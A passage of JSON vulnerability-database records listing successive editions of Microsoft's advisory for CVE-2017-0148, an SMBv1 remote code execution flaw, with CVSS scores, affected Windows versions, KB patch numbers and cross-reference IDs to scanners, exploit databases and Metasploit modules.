{"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:51:23", "differentElements": ["msAffectedSoftware"], "edition": 80}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-29T10:45:17", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3210720", "KB3212646", "KB4012215", "KB4012216", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012217", "KB4013198", "KB3177186", "KB4012212", "KB3205409", "KB4012598", "KB3205401", "KB3213986", "KB4012213", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:45:17", "differentElements": ["msAffectedSoftware"], "edition": 81}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-30T06:48:04", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3213986", "KB4012606", "KB4013429", "KB3177186", "KB4012598", "KBMS16-110, 3187754", "KB4012212", "KB4013198", "KB3205409", "KB4012216", "KB3212646", "KB4012215", "KB4012217", "KB3205401", "KB4012214", "KB3210721", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:48:04", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-30T20:47:04", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 